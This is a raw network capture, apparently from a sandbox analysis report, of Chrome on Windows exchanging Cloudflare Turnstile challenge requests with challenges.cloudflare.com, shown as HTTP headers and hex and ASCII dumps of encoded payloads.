                                                                                                                                                                                                                                            2025-01-10 12:36:39 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8ffcb6abdab37d06/1736512597511/3H40ckXZIbhbHk8 HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:39 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:39 GMT
                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                            Content-Length: 61
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6c4b9fd4399-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:39 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 59 00 00 00 60 08 02 00 00 00 f9 1c 49 9d 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                            Data Ascii: PNGIHDRY`IIDAT$IENDB`


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            133192.168.2.1749851104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:39 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8ffcb6abdab37d06/1736512597512/e71fcf0a2aec43d09442824780b7a9a9b76de46f1d3348e7711b63e3423fc2c8/w1ALpqNxOxzXP9c HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qvn8h/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:39 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:39 GMT
                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2025-01-10 12:36:39 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 35 78 5f 50 43 69 72 73 51 39 43 55 51 6f 4a 48 67 4c 65 70 71 62 64 74 35 47 38 64 4d 30 6a 6e 63 52 74 6a 34 30 49 5f 77 73 67 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                            Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g5x_PCirsQ9CUQoJHgLepqbdt5G8dM0jncRtj40I_wsgAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                            2025-01-10 12:36:39 UTC1INData Raw: 4a
                                                                                                                                                                                                                                            Data Ascii: J


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            134192.168.2.1749852104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:40 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/688879100:1736511142:tGsU17yq18PkVnI4wKa3Ww51WTbxFUU1SF8xW7QVDR4/8ffcb6abdab37d06/ZizkGAal8K5b0bq9fQsWLsrFRcrAiFKh.Y5WJ48rebc-1736512595-1.1.1.1-7REzBxzifHwqMMjHAfCLgybYIs4UYWCpBrJIy.X6bN2QQ58Y4moZJeHrjd0eNxGu HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 32212
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            CF-Challenge: ZizkGAal8K5b0bq9fQsWLsrFRcrAiFKh.Y5WJ48rebc-1736512595-1.1.1.1-7REzBxzifHwqMMjHAfCLgybYIs4UYWCpBrJIy.X6bN2QQ58Y4moZJeHrjd0eNxGu
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qvn8h/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:40 UTC16384OUTData Raw: 76 5f 38 66 66 63 62 36 61 62 64 61 62 33 37 64 30 36 3d 68 32 47 73 6e 52 79 25 32 62 6a 75 32 30 32 30 6f 32 79 6d 79 75 49 5a 51 49 51 59 79 2d 30 6c 73 4d 32 52 24 30 57 73 75 56 74 71 51 53 2d 30 49 6e 4e 4f 4e 73 47 6a 52 78 57 47 30 68 52 30 52 71 51 37 30 2b 5a 79 4d 30 56 66 30 24 59 30 4b 32 79 46 59 68 7a 52 6d 30 4e 73 30 78 30 6e 73 30 32 75 52 6f 67 47 79 4f 36 49 72 6d 34 73 68 30 58 34 32 79 4e 30 4b 47 30 6b 30 4e 56 46 47 41 69 30 79 69 30 67 73 51 33 67 42 48 52 30 30 75 49 30 51 48 47 30 30 37 75 2d 32 30 6b 69 6a 30 41 73 67 61 74 2d 32 53 66 73 51 67 45 70 53 7a 78 71 74 4b 30 79 47 53 45 2d 6d 7a 62 73 6a 66 37 75 4e 78 6a 48 6d 47 52 74 30 30 34 2d 6d 53 52 68 72 42 31 6e 30 53 7a 46 53 45 6b 58 49 30 4f 6e 55 6c 75 6e 64 68 70 31
                                                                                                                                                                                                                                            Data Ascii: v_8ffcb6abdab37d06=h2GsnRy%2bju2020o2ymyuIZQIQYy-0lsM2R$0WsuVtqQS-0InNONsGjRxWG0hR0RqQ70+ZyM0Vf0$Y0K2yFYhzRm0Ns0x0ns02uRogGyO6Irm4sh0X42yN0KG0k0NVFGAi0yi0gsQ3gBHR00uI0QHG007u-20kij0Asgat-2SfsQgEpSzxqtK0yGSE-mzbsjf7uNxjHmGRt004-mSRhrB1n0SzFSEkXI0OnUlundhp1
                                                                                                                                                                                                                                            2025-01-10 12:36:40 UTC15828OUTData Raw: 4c 46 4c 47 30 55 66 4e 30 6d 5a 30 6a 79 43 30 55 70 51 5a 68 5a 6d 47 79 54 6e 72 30 49 58 34 51 45 2b 30 72 73 79 49 30 50 30 62 47 30 32 30 4b 6a 6d 5a 30 69 79 2d 30 71 7a 59 49 79 6c 30 4a 78 79 30 30 35 30 43 5a 6d 75 79 6e 30 41 66 79 24 30 38 30 4b 66 79 2b 30 67 58 38 66 41 73 51 6b 30 63 4c 64 46 30 4c 30 31 30 52 5a 30 6f 30 51 30 38 47 79 54 30 55 30 41 52 30 62 30 75 66 38 47 30 71 30 55 4c 6f 24 30 42 30 55 4c 7a 68 58 37 30 46 73 79 46 34 6a 30 2d 66 79 30 79 58 30 38 48 38 73 51 68 30 57 5a 79 32 79 35 30 30 66 52 75 30 6a 30 71 73 79 66 73 70 30 4d 66 6d 2b 30 6a 30 41 66 6d 6d 30 79 30 38 6a 6d 47 30 42 47 6d 30 79 69 79 4c 30 71 73 51 30 79 76 30 61 42 59 47 79 76 30 2b 5a 41 36 34 57 6a 55 73 51 30 30 35 30 6c 30 79 66 73 50 30 57 30
                                                                                                                                                                                                                                            Data Ascii: LFLG0UfN0mZ0jyC0UpQZhZmGyTnr0IX4QE+0rsyI0P0bG020KjmZ0iy-0qzYIyl0Jxy0050CZmuyn0Afy$080Kfy+0gX8fAsQk0cLdF0L010RZ0o0Q08GyT0U0AR0b0uf8G0q0ULo$0B0ULzhX70FsyF4j0-fy0yX08H8sQh0WZy2y500fRu0j0qsyfsp0Mfm+0j0Afmm0y08jmG0BGm0yiyL0qsQ0yv0aBYGyv0+ZA64WjUsQ0050l0yfsP0W0
                                                                                                                                                                                                                                            2025-01-10 12:36:41 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:41 GMT
                                                                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 26336
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cf-chl-gen: WMPklVWUzz0fZsjdUZj5ErDGhKDTh6fsEC4QU3bMT/l2wHg2i6ppCWUDpIcR4k4O$uY0T5JOS+6A/wGDlVO5FdA==
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6cc1ae3726e-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:41 UTC1047INData Raw: 64 6f 53 59 73 71 79 54 63 37 47 36 76 4d 57 37 78 4d 6d 39 6f 37 58 49 71 70 6d 6d 30 63 69 64 71 74 57 74 31 4b 2f 5a 72 64 53 74 72 70 54 4f 74 39 76 51 6d 4e 65 31 6f 72 50 56 33 75 50 56 79 36 65 39 7a 4d 6d 38 78 73 6e 52 30 4d 4c 48 7a 2b 76 71 35 64 7a 4d 7a 65 66 59 32 74 33 79 30 2b 58 32 38 65 6a 2b 32 66 4c 6d 2f 75 4c 65 37 50 76 4a 43 41 49 45 45 4d 2f 78 38 75 4c 77 45 50 48 56 46 51 34 51 45 42 51 43 46 52 33 33 2f 53 41 6a 46 68 54 6e 2f 51 73 50 35 79 55 54 43 67 45 54 41 42 49 56 44 78 77 61 45 76 55 35 4c 6a 41 38 2b 68 38 33 42 68 41 37 48 50 73 64 4a 51 51 32 4f 45 6c 53 4d 53 67 72 51 68 49 66 44 6a 63 73 49 30 70 46 4b 54 6b 35 4b 6c 77 37 4d 47 51 68 55 6a 51 2f 57 45 63 35 52 53 42 45 61 55 34 70 59 45 52 45 4d 47 64 45 54 6a 45
                                                                                                                                                                                                                                            Data Ascii: doSYsqyTc7G6vMW7xMm9o7XIqpmm0cidqtWt1K/ZrdStrpTOt9vQmNe1orPV3uPVy6e9zMm8xsnR0MLHz+vq5dzMzefY2t3y0+X28ej+2fLm/uLe7PvJCAIEEM/x8uLwEPHVFQ4QEBQCFR33/SAjFhTn/QsP5yUTCgETABIVDxwaEvU5LjA8+h83BhA7HPsdJQQ2OElSMSgrQhIfDjcsI0pFKTk5Klw7MGQhUjQ/WEc5RSBEaU4pYEREMGdETjE
                                                                                                                                                                                                                                            2025-01-10 12:36:41 UTC1369INData Raw: 2f 76 72 2b 6b 72 70 4c 50 78 72 53 7a 6c 36 6a 53 32 4c 37 4e 33 4b 2b 68 71 37 65 74 70 4b 2f 64 36 4c 32 63 34 4f 76 42 36 2f 44 76 78 65 2f 6b 38 38 6e 73 34 36 2f 46 73 66 72 47 76 4e 71 78 76 75 4c 31 30 51 50 4e 34 64 6a 69 78 74 6a 4c 2b 38 54 72 45 50 37 36 30 41 55 54 79 39 4c 77 43 77 66 5a 45 42 72 74 46 67 6e 75 32 4f 44 64 4a 4f 34 58 2b 66 4d 4c 4a 52 6e 6a 2b 53 33 2b 4c 77 67 6b 42 44 59 6c 4d 42 41 55 46 51 63 50 50 42 6e 38 4f 7a 55 65 4c 41 77 50 2f 52 38 65 42 79 46 4c 47 69 59 64 44 42 31 4d 52 7a 73 70 53 78 49 55 51 52 56 58 4e 56 4a 4a 4a 7a 41 5a 47 46 45 75 48 31 4a 65 58 69 55 6b 4f 53 45 70 57 55 56 43 59 44 35 61 4c 6d 64 46 63 6c 46 30 57 48 4e 4b 5a 7a 6b 2b 58 6e 52 4f 4f 48 70 77 5a 57 4f 44 67 59 56 54 65 33 52 72 62 32
                                                                                                                                                                                                                                            Data Ascii: /vr+krpLPxrSzl6jS2L7N3K+hq7etpK/d6L2c4OvB6/Dvxe/k88ns46/FsfrGvNqxvuL10QPN4djixtjL+8TrEP760AUTy9LwCwfZEBrtFgnu2ODdJO4X+fMLJRnj+S3+LwgkBDYlMBAUFQcPPBn8OzUeLAwP/R8eByFLGiYdDB1MRzspSxIUQRVXNVJJJzAZGFEuH1JeXiUkOSEpWUVCYD5aLmdFclF0WHNKZzk+XnROOHpwZWODgYVTe3Rrb2
                                                                                                                                                                                                                                            2025-01-10 12:36:41 UTC1369INData Raw: 31 39 4b 76 72 36 32 54 6a 71 7a 58 33 5a 33 63 6d 39 65 33 76 37 6e 5a 34 65 43 6e 36 71 62 4e 32 38 6a 4e 78 73 4c 73 35 2b 6a 57 36 2b 66 77 35 63 76 52 39 66 66 51 76 4f 32 39 38 76 54 5a 78 66 54 42 33 67 79 39 2b 64 33 6d 41 42 45 4d 79 73 38 51 44 75 33 70 45 52 54 6f 39 64 6e 78 44 67 33 76 34 65 34 61 33 76 34 6f 35 79 51 6f 41 68 51 41 42 69 30 5a 36 67 77 4f 44 43 63 4d 41 77 4d 42 2b 54 45 33 4d 67 63 38 4b 78 49 53 44 77 30 68 49 42 55 31 47 53 55 66 46 77 59 2b 43 43 51 66 45 67 70 47 4e 55 4d 6a 56 79 45 72 4a 7a 55 77 58 69 74 68 4b 53 4a 5a 58 30 41 76 5a 46 4d 36 50 54 6c 45 4b 45 51 37 62 69 78 77 53 6c 78 49 54 30 5a 54 62 56 4e 34 4e 7a 56 50 50 54 38 2b 63 49 41 39 59 58 70 55 63 59 46 47 59 46 59 2f 67 59 4e 72 59 46 4a 52 55 45 39
                                                                                                                                                                                                                                            Data Ascii: 19Kvr62TjqzX3Z3cm9e3v7nZ4eCn6qbN28jNxsLs5+jW6+fw5cvR9ffQvO298vTZxfTB3gy9+d3mABEMys8QDu3pERTo9dnxDg3v4e4a3v4o5yQoAhQABi0Z6gwODCcMAwMB+TE3Mgc8KxISDw0hIBU1GSUfFwY+CCQfEgpGNUMjVyErJzUwXithKSJZX0AvZFM6PTlEKEQ7bixwSlxIT0ZTbVN4NzVPPT8+cIA9YXpUcYFGYFY/gYNrYFJRUE9
                                                                                                                                                                                                                                            2025-01-10 12:36:41 UTC1369INData Raw: 6f 2f 62 73 4c 44 69 7a 72 69 2f 6e 39 36 34 34 74 37 53 77 4f 58 69 31 73 53 6d 35 74 72 49 79 2b 72 65 7a 4d 69 31 75 75 53 35 30 76 6e 4d 74 2b 33 33 34 76 62 77 35 63 66 41 78 50 6a 36 2b 39 58 6f 36 2b 48 6b 38 4e 2f 76 41 51 44 53 36 50 6a 34 35 78 41 4b 39 76 76 39 36 2f 30 42 46 50 62 7a 2f 50 73 53 42 42 37 71 41 78 73 4d 4b 41 67 64 4d 51 77 42 45 79 67 34 47 50 67 63 38 79 6f 52 39 54 30 43 41 44 77 44 42 67 63 46 42 52 68 45 46 30 4e 4f 55 43 63 4f 55 6b 77 70 4e 6b 55 31 4a 79 55 56 4a 7a 4a 53 4c 69 64 4f 57 54 6c 57 58 6a 4d 6d 5a 6a 41 79 4b 54 51 6e 62 55 49 76 5a 58 42 47 62 32 56 30 53 6e 52 35 65 45 35 34 62 58 78 53 64 57 77 34 54 6a 71 44 54 30 56 6a 4f 6b 64 72 66 6c 71 4c 56 6c 74 47 67 48 42 2b 55 59 56 69 61 46 47 4b 67 31 64 56
                                                                                                                                                                                                                                            Data Ascii: o/bsLDizri/n9644t7SwOXi1sSm5trIy+rezMi1uuS50vnMt+334vbw5cfAxPj6+9Xo6+Hk8N/vAQDS6Pj45xAK9vv96/0BFPbz/PsSBB7qAxsMKAgdMQwBEyg4GPgc8yoR9T0CADwDBgcFBRhEF0NOUCcOUkwpNkU1JyUVJzJSLidOWTlWXjMmZjAyKTQnbUIvZXBGb2V0SnR5eE54bXxSdWw4TjqDT0VjOkdrflqLVltGgHB+UYViaFGKg1dV
                                                                                                                                                                                                                                            2025-01-10 12:36:41 UTC1369INData Raw: 33 4e 7a 39 2f 65 32 36 58 62 75 72 2f 71 76 72 36 74 70 38 54 70 31 64 62 42 7a 73 6e 73 38 38 37 77 2b 66 72 34 31 76 33 38 37 4c 30 47 42 4d 58 39 2f 63 54 67 76 75 37 36 37 38 67 53 30 4f 37 6b 46 2b 6a 4e 47 4f 34 4c 37 75 2f 2b 2f 68 30 63 48 67 41 61 47 50 6e 36 49 4f 67 59 41 69 58 72 4a 68 34 65 4a 78 73 6b 4a 51 59 74 4e 79 45 4a 4e 2f 55 50 2b 54 34 52 4e 68 59 6a 43 7a 45 59 51 6a 41 48 50 51 42 49 43 77 6f 4b 53 43 55 39 43 6b 38 6f 56 55 31 52 55 79 63 53 56 54 41 37 57 47 41 79 50 32 4e 6a 54 31 70 48 59 31 45 6a 4e 6d 5a 57 56 6b 70 76 52 57 56 72 4b 31 31 68 63 48 46 4e 5a 58 4d 30 4f 6a 64 55 65 47 6c 63 55 6f 4a 73 51 6f 53 47 57 6a 75 4b 68 6d 46 6f 57 6f 6c 34 62 30 36 54 6a 33 4f 57 6a 32 74 6b 65 5a 57 56 56 33 6d 66 64 5a 61 44 70
                                                                                                                                                                                                                                            Data Ascii: 3Nz9/e26Xbur/qvr6tp8Tp1dbBzsns887w+fr41v387L0GBMX9/cTgvu7678gS0O7kF+jNGO4L7u/+/h0cHgAaGPn6IOgYAiXrJh4eJxskJQYtNyEJN/UP+T4RNhYjCzEYQjAHPQBICwoKSCU9Ck8oVU1RUycSVTA7WGAyP2NjT1pHY1EjNmZWVkpvRWVrK11hcHFNZXM0OjdUeGlcUoJsQoSGWjuKhmFoWol4b06Tj3OWj2tkeZWVV3mfdZaDp
                                                                                                                                                                                                                                            2025-01-10 12:36:41 UTC1369INData Raw: 67 6e 65 53 6e 35 4d 65 6d 35 37 44 77 30 2f 57 6f 74 63 75 32 75 50 6a 54 2f 4d 32 31 32 38 48 41 38 72 6f 48 75 4e 37 38 77 4d 62 65 36 67 49 4b 34 63 6b 4f 43 39 44 66 43 42 4d 52 45 52 59 55 37 51 30 51 46 52 7a 36 45 39 38 64 45 52 58 78 32 52 6f 6d 36 68 6b 41 36 79 6b 74 4b 69 37 78 36 51 45 6a 39 67 2f 79 4e 67 72 78 46 50 6a 77 4b 52 77 30 4f 54 77 58 50 6b 46 41 4f 55 55 47 48 67 5a 42 53 45 6b 6a 53 55 77 53 4d 30 70 53 4c 6c 45 55 55 54 51 54 56 42 31 64 51 47 49 56 49 6a 67 6a 4a 57 56 41 61 54 6f 69 53 43 34 74 58 79 64 7a 4a 55 74 70 4c 58 42 77 4e 6e 42 31 64 48 46 31 4f 6c 5a 62 63 6e 6c 38 50 6f 4b 43 63 56 53 43 68 6b 6c 5a 5a 55 78 6d 54 30 70 53 6b 5a 47 57 53 5a 52 58 6d 31 70 31 55 31 56 56 6a 46 79 50 59 6c 71 57 59 71 4a 36 59 71
                                                                                                                                                                                                                                            Data Ascii: gneSn5Mem57Dw0/Wotcu2uPjT/M2128HA8roHuN78wMbe6gIK4ckOC9DfCBMRERYU7Q0QFRz6E98dERXx2Rom6hkA6yktKi7x6QEj9g/yNgrxFPjwKRw0OTwXPkFAOUUGHgZBSEkjSUwSM0pSLlEUUTQTVB1dQGIVIjgjJWVAaToiSC4tXydzJUtpLXBwNnB1dHF1OlZbcnl8PoKCcVSChklZZUxmT0pSkZGWSZRXm1p1U1VVjFyPYlqWYqJ6Yq
                                                                                                                                                                                                                                            2025-01-10 12:36:41 UTC1369INData Raw: 36 4f 71 77 70 75 37 76 38 4d 4c 30 38 37 6a 61 39 66 66 6e 32 76 33 37 2b 2b 49 42 41 64 6e 42 41 67 4c 7a 41 51 6b 47 34 63 49 4c 44 4f 55 56 46 42 41 41 39 67 77 54 46 42 55 57 47 41 67 68 47 52 77 4e 37 69 49 67 45 43 55 6a 4a 50 33 70 4a 69 6a 73 4a 53 77 74 42 76 45 73 4c 79 41 78 4c 54 4d 6b 4e 54 67 34 2f 44 31 41 50 44 78 42 51 30 41 61 4f 54 78 44 4e 43 74 4b 53 44 6b 62 54 6b 6f 6d 45 6c 42 51 46 56 6c 57 55 79 34 57 57 56 6b 79 45 31 35 62 54 45 4e 66 59 43 56 70 58 47 51 2b 62 57 78 6f 4c 53 4e 6f 61 31 78 78 62 6d 39 4b 64 58 4e 30 5a 55 64 37 64 32 67 36 65 6e 78 57 66 58 31 2b 57 6b 4b 44 68 56 34 2f 68 6f 68 69 6b 59 2b 4c 66 46 4b 49 6b 47 71 4a 6d 4a 4e 75 6e 5a 47 58 63 70 57 62 6e 49 79 44 6f 4a 36 52 63 36 61 6a 61 61 47 6b 71 4b 68
                                                                                                                                                                                                                                            Data Ascii: 6Oqwpu7v8ML087ja9ffn2v37++IBAdnBAgLzAQkG4cILDOUVFBAA9gwTFBUWGAghGRwN7iIgECUjJP3pJijsJSwtBvEsLyAxLTMkNTg4/D1APDxBQ0AaOTxDNCtKSDkbTkomElBQFVlWUy4WWVkyE15bTENfYCVpXGQ+bWxoLSNoa1xxbm9KdXN0ZUd7d2g6enxWfX1+WkKDhV4/hohikY+LfFKIkGqJmJNunZGXcpWbnIyDoJ6Rc6ajaaGkqKh
                                                                                                                                                                                                                                            2025-01-10 12:36:41 UTC1369INData Raw: 4d 72 33 78 72 6e 61 2b 37 6e 75 37 4c 37 4f 32 39 54 6b 41 2f 62 53 77 51 58 55 78 39 7a 63 2f 64 37 4a 44 64 77 44 35 4f 51 47 35 74 45 56 35 4f 34 4e 37 4e 33 6f 2b 78 6b 51 31 74 7a 79 49 66 49 6d 4a 67 51 41 4b 79 72 34 41 7a 41 73 48 4f 62 74 2f 6a 54 71 38 41 63 31 42 7a 6f 34 4f 52 39 41 44 68 59 55 51 6b 49 52 47 30 67 59 48 30 4d 33 46 7a 38 76 44 79 46 53 4a 54 4a 54 52 7a 63 53 56 53 55 76 54 53 74 4a 4b 54 74 5a 50 53 39 6b 4d 7a 6f 31 53 57 55 31 57 56 30 74 61 55 6c 51 62 54 31 4c 4c 6e 46 42 59 57 6c 49 5a 55 56 62 64 56 6c 62 67 46 42 57 55 57 2b 42 55 59 56 35 53 59 56 6c 61 59 6c 59 6b 55 70 4f 62 56 52 6c 6b 47 42 6e 69 56 6d 56 64 59 65 5a 61 57 42 78 6e 47 78 7a 58 71 46 78 61 48 6d 6b 68 48 75 64 62 61 6d 4a 6a 71 31 39 64 49 57 77
                                                                                                                                                                                                                                            Data Ascii: Mr3xrna+7nu7L7O29TkA/bSwQXUx9zc/d7JDdwD5OQG5tEV5O4N7N3o+xkQ1tzyIfImJgQAKyr4AzAsHObt/jTq8Ac1Bzo4OR9ADhYUQkIRG0gYH0M3Fz8vDyFSJTJTRzcSVSUvTStJKTtZPS9kMzo1SWU1WV0taUlQbT1LLnFBYWlIZUVbdVlbgFBWUW+BUYV5SYVlaYlYkUpObVRlkGBniVmVdYeZaWBxnGxzXqFxaHmkhHudbamJjq19dIWw


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            135192.168.2.1749853104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:41 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/688879100:1736511142:tGsU17yq18PkVnI4wKa3Ww51WTbxFUU1SF8xW7QVDR4/8ffcb6abdab37d06/ZizkGAal8K5b0bq9fQsWLsrFRcrAiFKh.Y5WJ48rebc-1736512595-1.1.1.1-7REzBxzifHwqMMjHAfCLgybYIs4UYWCpBrJIy.X6bN2QQ58Y4moZJeHrjd0eNxGu HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:41 UTC375INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:41 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 7
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                            cf-chl-out: U7+sYpqlajgR/yKITxV9sA==$FrnGghf1uwzJWHnjTzj3jw==
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6d15b0842ac-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:41 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                            Data Ascii: invalid


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            136192.168.2.1749855104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:44 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/688879100:1736511142:tGsU17yq18PkVnI4wKa3Ww51WTbxFUU1SF8xW7QVDR4/8ffcb6abdab37d06/ZizkGAal8K5b0bq9fQsWLsrFRcrAiFKh.Y5WJ48rebc-1736512595-1.1.1.1-7REzBxzifHwqMMjHAfCLgybYIs4UYWCpBrJIy.X6bN2QQ58Y4moZJeHrjd0eNxGu HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 34615
